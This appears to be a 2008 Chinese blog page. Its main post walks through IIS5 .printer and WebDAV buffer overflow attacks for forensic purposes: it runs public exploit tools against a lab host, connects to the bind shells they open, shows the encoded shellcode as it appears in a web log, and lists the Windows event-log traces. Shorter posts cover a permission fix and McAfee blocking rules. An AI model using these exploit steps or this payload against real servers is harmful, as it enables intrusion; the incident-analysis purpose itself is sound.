-
IIS5缓冲区溢出
2008-06-25 17:06:43
IIS5缓冲区溢出
我曾经粗略做了一个统计,WINDOWS涉及到溢出的漏洞稍微多于LINUX,而WINDOWS的大
量的溢出漏洞与IIS有关,所以没有IIS的WINDOWS的整体
安全性绝对要高于LINUX,这几句话涉及到了WINDOWS与LINUX之争,所以就不再多说
了,免得又引起无谓的“口水战”。
熟悉缓冲区溢出攻击必须对溢出的工作方式有所了解,由于本身溢出就是一个很大的课
题,所以我们只简单的介绍一下:如果一个程序没有限
制输入的字符长度或者检查输入长度是否正确,就会发生溢出。一个没有进行限制的输
入就有可能因为输入长度的问题“溢出”到CPU运行栈的
另一部分去,如果这个输入被精心的设计过,那么它可以被用来运行指定的代码。而
IIS运行的帐户环境是SYSTEM,所以通过溢出得到的是
SYSTEM权限,而SYSTEM权限是系统内的最高技术权限,因此IIS缓冲区溢出造成的灾难
往往是致命的。
IPP缓冲区溢出
这个漏洞比较早了,但是一直私下里认为这是一个很典型的IIS溢出漏洞攻击,所以又
翻了出来,这个漏洞存在于处理.printer文件的ISAPI过
滤器(c:\winnt\system32\msw3prt.dll),它为WIN2000提供INTERNET打印协议,即IPP
的支持,可实现对网络打印机的基于WEB的控制,
在.printer ISAPI请求中,在HTTP HOST:头中发送420字节的缓冲区,就会发生溢出,
如下:
GET /NULL.PRINTER HTTP/1.0
HOST: [BUFFER为420个字符]
发生溢出后IIS异常终止,但是为了2000为了保障WEB的弹性运行,这时会自动重新运行
IIS(inetinfo.exe),在后面提供的日志里你可以充分
的注意到这一点。
互联网上流行的最成功的一个IPP漏洞利用工具是IIS5HACK,不过最近的这个工具的版
本好象都被加了木马。
操作如下:
E:\>iis5hack 192.168.0.87 80 0 1256
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
checking...
Now you can telnet to 1256 port
good luck :)
E:\>
这时使用“telnet 192.168.0.87 1256”就可以连接到目标服务器上,我们可以看到目
标服务器系统装在H盘上。
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
H:\WINNT\system32>
在这个过程里,IIS日志里一般不会出现记录,但是在事件查看器里的系统日志项目里
将会出现IIS各个组建停止的信息,安全项目里也将出现
以下的日志:
事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期: 2003-12-16
事件: 15:34:13
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名: \inetinfo.exe
事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期: 2003-12-16
事件: 15:34:13
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
服务器: NT Local Security Authority / Authentication Service
服务: LsaRegisterLogonProcess()
主要用户名: 123-DK8KIFN4NZR$
主要域: SERVER
主要登录 ID: (0x0,0x3E7)
客户端用户名: 123-DK8KIFN4NZR$
客户端域: SERVER
客户端登录 ID: (0x0,0x3E7)
特权: SeTcbPrivilege
事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期: 2003-12-16
事件: 15:34:13
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
IUSR_123-DK8KIFN4NZR
工作站:
123-DK8KIFN4NZR
事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期: 2003-12-16
事件: 15:34:13
用户: 123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
用户名: IUSR_123-DK8KIFN4NZR
域: 123-DK8KIFN4NZR
登录 ID: (0x0,0x17FBA)
登录类型: 3
登录过程: IIS
身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名: 123-DK8KIFN4NZR
事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期: 2003-12-16
事件: 15:34:13
用户: 123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
用户名: IUSR_123-DK8KIFN4NZR
域: 123-DK8KIFN4NZR
登录 ID: (0x0,0x17FBA)
已指派: SeChangeNotifyPrivilege
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 15:34:57
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 4282631840
映象文件名: \WINNT\system32\dllhost.exe
创建者过程 ID: 2258146112
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 15:34:58
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 4280877088
映象文件名: \WINNT\system32\cmd.exe
创建者过程 ID: 4285625728
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
从上面我们可以看出,在判断溢出攻击的时候,仅仅靠WEB日志还是不够的,因为在发
生溢出的时候,IIS多半已经被停止了,无法提供给我们
更多的线索,需要更好的对攻击进行分析的话,需要我们多方位的入手。
WebDAV远程缓冲区溢出漏洞
WebDAV 是 HTTP 规范的行业标准扩展。“WebDAV”中的“DAV”代表“分布式创作和版
本控制”。WebDAV 为授权用户提供了在 Web 服务器上
远程添加和管理内容的能力。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过
HTTP向用户提供远程文件存储的服务。但是作为普通的
HTTP服务器,这个功能没有必要。
IIS5包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏
洞对WebDAV进行缓冲区溢出攻击,可能以WEB进程权限在
系统上执行任意指令。IIS 5.0的WebDAV使用了ntdll.dll中的一些函数,而这些函数存
在一个缓冲区溢出漏洞。通过对WebDAV的畸形请求可以
触发这个溢出。成功利用这个漏洞可以获得LocalSystem权限。这意味着,入侵者可以
获得主机的完全控制能力。任何能够将 WebDAV 请求传输
到受影响的 Web 服务器的用户都可以尝试利用此弱点。由于 WebDAV 请求是在 HTTP
所在的同一端口(通常是端口 80)上传输,这实质上意
味着任何能够与受影响的服务器建立连接的用户都可以尝试利用此弱点。
网络上WebDAV攻击工具非常的多,使用也很简单,所以造成了前一段时间WEBDAV攻击泛
滥,
其中最著名的是WEBDAVX3,需要注意的是这个程序是有时间期限的,但是可以通过调整
系统时间的方法解决,比如说将时间调回2002年,这并不会影响这个程序的使用。
C:\>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart....................... (IIS正在重起)
try offset: -4
在这一时候计算机会有一段长时间停止,只需要使用^C短开,就可以使用NC或者TELNET
连上去了。
C:\>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
以下是遭到WEBDAV溢出攻击后的WEB日志主要特征:
2003-12-16 05:51:38 192.168.0.235 - 192.168.0.87 80 LOCK
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契
桘杲楜厐晞暭餽畠囸噖晟暭丽琀連愬傐晙邭愬咍炈咍邊咍
炊咍邊塒璪痘郖偘偐郃悙
ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpepppppp
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile
fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdneoeoeoe
ohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfj
fihfokppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihh
ppppppcecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -
400 -
在事件查看器里的系统日志项目里将会出现IIS各个组件停止的信息,安全项目里也将
出现
以下的日志:
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 13:52:02
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 4281625184
映象文件名: \WINNT\system32\iisreset.exe
创建者过程 ID: 2171497184
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 13:52:03
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 2276659232
映象文件名: \WINNT\system32\inetsrv\iisrstas.exe
创建者过程 ID: 2244638496
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 13:52:03
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 4274700320
映象文件名: \WINNT\system32\inetsrv\inetinfo.exe
创建者过程 ID: 2171497184
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期: 2003-12-16
事件: 13:52:03
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
服务器: NT Local Security Authority / Authentication Service
服务: LsaRegisterLogonProcess()
主要用户名: 123-DK8KIFN4NZR$
主要域: SERVER
主要登录 ID: (0x0,0x3E7)
客户端用户名: 123-DK8KIFN4NZR$
客户端域: SERVER
客户端登录 ID: (0x0,0x3E7)
特权: SeTcbPrivilege
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期: 2003-12-16
事件: 13:52:10
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
过程 ID: 832
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 593
日期: 2003-12-16
事件: 13:52:16
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经退出某过程:
过程 ID: 980
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
事件类型: 成功审核
事件来源: Security
事件种类: 系统事件
事件 ID: 515
日期: 2003-12-16
事件: 13:52:25
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名: \inetinfo.exe
事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 577
日期: 2003-12-16
事件: 13:52:25
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
调用的特许服务:
服务器: NT Local Security Authority / Authentication Service
服务: LsaRegisterLogonProcess()
主要用户名: 123-DK8KIFN4NZR$
主要域: SERVER
主要登录 ID: (0x0,0x3E7)
客户端用户名: 123-DK8KIFN4NZR$
客户端域: SERVER
客户端登录 ID: (0x0,0x3E7)
特权: SeTcbPrivilege
事件类型: 成功审核
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期: 2003-12-16
事件: 13:52:25
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
为登录所用的帐户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名:
IUSR_123-DK8KIFN4NZR
工作站:
123-DK8KIFN4NZR
事件类型: 成功审核
事件来源: Security
事件种类: 登录/注销
事件 ID: 540
日期: 2003-12-16
事件: 13:52:25
用户: 123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
成功的网络登录:
用户名: IUSR_123-DK8KIFN4NZR
域: 123-DK8KIFN4NZR
登录 ID: (0x0,0x1D0EFE)
登录类型: 3
登录过程: IIS
身份验证程序包: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名: 123-DK8KIFN4NZR
事件类型: 成功审核
事件来源: Security
事件种类: 特权使用
事件 ID: 576
日期: 2003-12-16
事件: 13:52:25
用户: 123-DK8KIFN4NZR\IUSR_123-DK8KIFN4NZR
计算机: 123-DK8KIFN4NZR
描述:
指派给新登录的特殊权限:
用户名: IUSR_123-DK8KIFN4NZR
域: 123-DK8KIFN4NZR
登录 ID: (0x0,0x1D0EFE)
已指派: SeChangeNotifyPrivilege
事件类型: 成功审核
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2003-12-16
事件: 13:52:25
用户: NT AUTHORITY\SYSTEM
计算机: 123-DK8KIFN4NZR
描述:
已经创建新的过程:
新的过程 ID: 4276928544
映象文件名: \WINNT\system32\cmd.exe
创建者过程 ID: 4274700320
用户名: 123-DK8KIFN4NZR$
域: SERVER
登录 ID: (0x0,0x3E7)
需要注意的是,在WEBDAV溢出的过程中IIS会产生多次重复启动,而在WEB的日志里并不
能看出这一点,而这一点在事件查看器里的系统日志里和安全日志里都可以清楚的看
到。
关于WEBDAV的防范措施与本主题无关,且网络上很多地方提供了,就不赘述了。 -
SideBySide错误解决方法
2008-06-25 16:32:09
Generate Activation Context 为 C:\WINDOWS\system32\TAPI32.dll 失败。 参考错误消息: 拒绝访问。
Resolve Partial Assembly 为 Microsoft.Windows.Common-Controls 失败。 参考错误消息: 拒绝访问。
Generate Activation Context 为 C:\WINDOWS\system32\mlang.dll 失败。 参考错误消息: 拒绝访问。
Generate Activation Context 为 C:\WINDOWS\system32\urlmon.dll 失败。 参考错误消息: 拒绝访问。
这些错误都是因为权限设置过严造成的。
解决办法:给USERS用户组读取C:\WINDOWS\system32目录的权限。 -
mcafee规则设置1
2008-05-07 03:24:48
让有些朋友能手动添加MCAFEE8.0!企业版的一些规则。
使用mcafee后,感觉它的监控真是没得说,的确不错的杀软,不过对于新手来说可能设置麻烦了点,但如果只用默认设置的话就安全性低了点,也许很多朋友都是导入现成的规则,本着DIY的想法,并且每个人都应该有他们自己独特的设置,所以与大家分享咖啡的规则设置。
许多人对咖啡不了解。先对咖啡略为介绍。
咖啡是国际上三大杀软之一,也是下载使用率最高的杀软。它是迄今为止监控最灵敏的杀软,也是监控最全面的杀软。
下面是咖啡官方对咖啡杀软的简介:
McAfee防毒软件,除了操作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能! 除了帮你侦测和清除病毒,它还有VShield自动监视系统,会常驻在System Tray,当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改你的设定。
本人强烈推荐 McAfee VirusScan 8.0i 中文企业版+Anti-Spyware
安装咖啡注意事项:
1、在安装时,时间选项里,请选择“永久”,不要选择预订一年之类。
2、第一次升级咖啡,会很慢,大约2~3小时才能完成。请耐心等待。以后病毒库升级会很快,一般1~3分钟搞定。目前咖啡1~3天升级一次。个别时,一天升级3次以上。
咖啡安装完成了,先对咖啡进行一些设置。
1、访问保护。双击访问保护,打开访问保护。出现端口阻挡,文件保护,报告,三个选项。
(1)、更改端口设置。默认端口阻挡全部勾选。
添加阻挡端口新规则。端口总共有65535个。好了,把1~65535端口全部进行设置。由于咖啡对端口的阻挡模式分为两种:阻止入站,阻止出站,这样,对1~65535端口进行设置,需要分为两组。一组阻止通过1~65535端口入站,一组阻止通过1~65535端口出站。为了方便设置和查看端口阻挡而影响的进程,可以这样进行设置。1~1000,每隔100个端口设置一个规则,并进行规则标号。1000~10000,每隔1000个端口设置一个规则,也进行规则标号。10000~65535设置成一个规则,同时进行标号。这样设置好了,可以连网进行测试,怎么样,不能上网吧?当然别人也进不来了。好了,打开咖啡日志,查看那些进程被阻止,阻止的具体规则是哪些。比如,咖啡日志标明,svchost.exe进程被新规则1阻止,好了,选中新规则1,点击“编辑”,弹出对话框,在已排除进程里,添加svchost.exe,好了。依次类推,将影响的进程添加进去。设置好了之后,可以上网了。这样进行端口设置,可以阻挡99%的端口。那些通过端口出入的木马几乎没戏了。
(2)、更改访问保护设置。勾选所有默认设置。一一打开编辑,查看每个规则设置情况,凡是能够选择“阻止并报告访问尝试”,一律选择。——默认规则里,许多都是警告模式,将它们更改(注:如果更改默认设置,请再三思量,否则出现意外情况,我不负责)。将远程对exe、ocx等文件保护规则合并。但凡远程操作,在创建文件、写入文件、执行文件、读取文件、删除文件前全部打勾。
(3)、更改咖啡日志路径。放在其他盘里。
2、有害程序策略。默认规则里,都没有勾选。将他们全部勾选。
3、给咖啡杀软设置密码。咖啡控制台——工具——用户界面选项——密码选项。选择使用密码保护下面所有项目。设置8位以上超强密码。在用咖啡设置一系列规则之后,可以锁定咖啡杀软界面。这样,别人不能再更改您对咖啡的设置了。
4、共享资源的保护。打开咖啡访问保护——文件保护——共享资源,将它设置成阻止并报告访问尝试。这样,共享资源就不能被别人共享了。
5、按访问扫描程序设置。常规——扫描——将引导区,关机时扫描软盘去掉。
其他设置,自己看着办吧。
上面是咖啡本身携带的一些规则。为了安全,可以进行更加严格的设置。
1、用咖啡杀软来防止3721、网络猪、中文邮、百度搜霸、一搜等流氓软件。
目前,3721、网络猪、中文邮、百度搜霸、一搜经常偷偷溜进您的电脑,而且难以卸载干净。用咖啡杀软可以阻止它们进入。
打开咖啡杀软访问保护,创建如下几个规则:
1、禁止在本地创建、写入、执行、读取3721任何内容;
2、禁止在本地创建、写入、执行、读取网络猪任何内容;
3、禁止在本地创建、写入、执行、读取中文邮任何内容;
4、禁止在本地创建、写入、执行、读取百度搜霸任何内容;
5、禁止在本地创建、写入、执行、读取一搜任何内容。
好了,3721、网络猪、中文邮、百度搜霸、一搜等流氓软件没有理由呆在您的电脑里了。
附上部分设置方法。比如,防止3721的方法:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在本地创建、写入、执行、读取3721任何内容
阻挡对象:*
要阻挡的文件或文件名:**\3721*\**
要阻止的文件操作:在创建文件、写入文件、执行文件、读取文件前全部打勾
响应方式:阻止并报告访问尝试
偶安装不少软件都捆绑3721,当咖啡打开此规则时,3721只见到一个鬼影子——空的3721文件夹。
2、用咖啡杀软来防止未知木马病毒
我查了下相关资料,就目前来说,木马、病毒基本都是三种类型的,exe、dll、vxd类型。好了,只要我们创建如下三种保护机制:
1、禁止在本地任何地方创建、写入任何exe文件
2、禁止在本地任何地方创建、写入任何dll文件
3、禁止在本地任何地方创建、写入任何vxd文件
这样,现在出现的各种木马病毒是进不来的。当然,这条规则非常霸道,就是您更新咖啡病毒库,对其他软件进行升级,下载exe、dll、vxd类型文件,以及移动任何exe、dll、vxd类型文件也不可能了。所以,当您进行类似操作时,暂时取消此规则,等操作完成之后,再继续使用。
部分规则创建如下所示:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止在本地任何地方创建、写入任何exe文件
阻挡对象:*
要阻挡的文件或文件名:**\*.exe
要阻止的文件操作:在创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
其他的类似规则,参照设置即可。
3、阻挡肆意删除文件的行为
现在出现许多删除mp3格式的病毒。好了,为了杜绝此类事件发生,可以这样做。打开咖啡访问保护,创建如下规则:禁止删除本地任何mp3文件。好了,那些病毒想删除mp3是不可能的了。即便是您自己也删不掉mp3了!除非解禁!为了杜绝类似删除某些文件的病毒、木马,好了。我们再创建一条规则:禁止删除本地任何内容。好了,那些肆意删除各种文件的病毒、木马,根本起不了什么作用。当然,如果这条规则起作用,您自己也不可能删除任何东西了。当您自己需要删除某些内容,暂时取消这条规则,等删除操作完成了,再打开就是了。这条规则保护自己电脑不被别人删除任何东西非常管用哦。而且别人莫名其妙的,他根本不会想到是咖啡在阻止删除操作哦!
规则创建如下所示:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止删除本地任何mp3文件
阻挡对象:*
要阻挡的文件或文件名:**\*.mp3
要阻止的文件操作:在删除文件前打勾
响应方式:阻止并报告访问尝试
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止删除本地任何内容
阻挡对象:*
要阻挡的文件或文件名:**\*\**
要阻止的文件操作:在删除文件前打勾
响应方式:阻止并报告访问尝试
个人也可以使用类似方法保护任何一个文件不被删除。比如rm文件等。自己照猫画虎试试。
4、用咖啡杀软保护注册表。
目前许多木马、病毒都喜欢在注册表驻留。好了。我们用咖啡创建这样一条规则。禁止对本地注册表进行创建、写入活动。好了。除非您同意,否则,注册表是不会无缘无故的被修改的。包括安装软件在内,如果咖啡依然开启这条规则,哈哈,软件虽然安装完了,注册表里却没有写入什么东西。虽然不少软件需要写入注册表里才成,可注册表里没有被写入也可以用的哦——不信的可以实验下!当然,不写入注册表,软件功能上会打折扣,尤其是杀软、防火墙之类。我曾做过类似实验。不让反间谍软件写入注册表里,结果它只能查到间谍,却不能清除间谍(查到间谍数量与反间谍软件安装时是否写入注册表无关)。对比一下金山、瑞星的注册表监视功能,金山、瑞星简直差远了。他们对注册表的监视不但烦人,而且意义不是很大。比如,安装一个软件,点击阻止写入注册表,那您就一直点下去吧。十年也点不完。有什么意义?
规则创建如下所示:
咖啡控制台------访问保护------文件夹保护-----添加
规则名称:禁止对本地注册表进行创建、写入活动
阻挡对象:*
要阻挡的文件或文件名:**\*.reg
要阻止的文件操作:在创建文件、写入文件前打勾
响应方式:阻止并报告访问尝试
5、用咖啡来保护主页。
